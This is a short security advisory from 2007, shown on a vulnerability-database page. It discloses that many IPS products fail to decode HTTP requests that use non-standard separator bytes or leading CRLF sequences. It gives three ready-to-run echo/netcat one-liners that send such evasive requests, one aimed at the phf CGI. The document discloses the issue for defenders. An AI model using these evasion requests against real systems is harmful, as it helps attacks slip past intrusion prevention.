Lucene search
K

ips-evasion.txt

🗓️ 20 Jun 2007 00:00:00Reported by H D MooreType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Many IPS products fail to decode HTTP requests using non-standard separators and multiple CRLF sequences, potentially allowing evasion of security measures

Code
`Summarized from https://strikecenter.bpointsys.com/  
  
Many commercial IPS products fail to decode HTTP requests which use 0x0c,   
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in   
the following format will evade most IPS protocol decoders:  
  
$ echo -ne "GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n" | \  
nc webserver 80  
  
A request which contains multiple CRLF sequences instead of a valid method   
is processed by Apache, yet ignored by most IPS engines:  
  
$ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \  
nc webserver 80  
  
The first issue was covered more than a year ago, yet most IPS vendors   
have failed to address it. The second issue is new, as far as I know. You   
can even combine them:  
  
$ echo -ne "\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n" | \  
nc webserver 80  
  
-HD  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
27